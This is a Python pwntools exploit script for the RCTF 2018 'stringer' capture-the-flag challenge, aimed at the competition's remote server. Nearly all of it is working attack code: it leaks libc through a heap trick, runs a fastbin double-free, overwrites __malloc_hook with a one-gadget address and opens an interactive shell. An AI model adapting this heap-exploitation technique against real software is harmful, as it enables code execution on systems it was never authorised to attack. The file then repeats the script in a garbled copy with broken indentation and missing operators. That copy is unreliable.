hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
# RCTF 2018 stringer pwn
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./stringer')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "stringer.2018.teamrois.cn"
RPORT = 7272
LHOST = "127.0.0.1"
LPORT = 7272

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./stringer'], gdbscript=gdbscript)
else:
    conn = process(['./stringer'])
    # conn = process(['./stringer'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

def new(size, content):
    conn.sendlineafter('choice: ', '1')
    conn.sendlineafter('length: ', str(size))
    conn.sendlineafter('content: ', content)

def edit(idx, byte):
    conn.sendlineafter('choice: ', '3')
    conn.sendlineafter('index: ', str(idx))
    conn.sendlineafter('index: ', str(byte))

def delete(idx):
    conn.sendlineafter('choice: ', '4')
    conn.sendlineafter('index: ', str(idx))

# exploit
log.info('Pwning')

new(0xf8, 'x'*0xf8) # 0
new(0x68, 'z'*0x68) # 1
delete(0)
new(0x68, 'a'*4)    # 2
new(0x68, 'b'*4)    # 3

# set IS_MAPPED
for _ in range(2):
    edit(0, 0xd8)
new(0x18, '') # 4
conn.recvuntil('string: ')
libc_base = u64(conn.recv(6)+'\x00'*2) - 0x3c4b0a
dbg('libc_base')

# fastbin attack
delete(2)
delete(3)
delete(2)
new(0x68, p64(libc_base+0x3c4aed))
new(0x68, 'hoge')
new(0x68, 'hoge')
# overwrite __malloc_hook
payload = '\x00'*3 + p64(0)*2 + p64(libc_base + 0xf02a4)
new(0x68, payload)
conn.interactive()
	#!/usr/bin/env python
	# RCTF 2018 stringer pwn
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./stringer')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "stringer.2018.teamrois.cn"
	RPORT = 7272
	LHOST = "127.0.0.1"
	LPORT = 7272

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./stringer'], gdbscript=gdbscript)
	else:
	conn = process(['./stringer'])
	# conn = process(['./stringer'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	def new(size, content):
	conn.sendlineafter('choice: ', '1')
	conn.sendlineafter('length: ', str(size))
	conn.sendlineafter('content: ', content)

	def edit(idx, byte):
	conn.sendlineafter('choice: ', '3')
	conn.sendlineafter('index: ', str(idx))
	conn.sendlineafter('index: ', str(byte))

	def delete(idx):
	conn.sendlineafter('choice: ', '4')
	conn.sendlineafter('index: ', str(idx))

	# exploit
	log.info('Pwning')

	new(0xf8, 'x'*0xf8) # 0
	new(0x68, 'z'*0x68) # 1
	delete(0)
	new(0x68, 'a'*4) # 2
	new(0x68, 'b'*4) # 3

	# set IS_MAPPED
	for _ in range(2):
	edit(0, 0xd8)
	new(0x18, '') # 4
	conn.recvuntil('string: ')
	libc_base = u64(conn.recv(6)+'\x00'*2) - 0x3c4b0a
	dbg('libc_base')

	# fastbin attack
	delete(2)
	delete(3)
	delete(2)
	new(0x68, p64(libc_base+0x3c4aed))
	new(0x68, 'hoge')
	new(0x68, 'hoge')
	# overwrite __malloc_hook
	payload = '\x00'3 + p64(0)2 + p64(libc_base + 0xf02a4)
	new(0x68, payload)
	conn.interactive()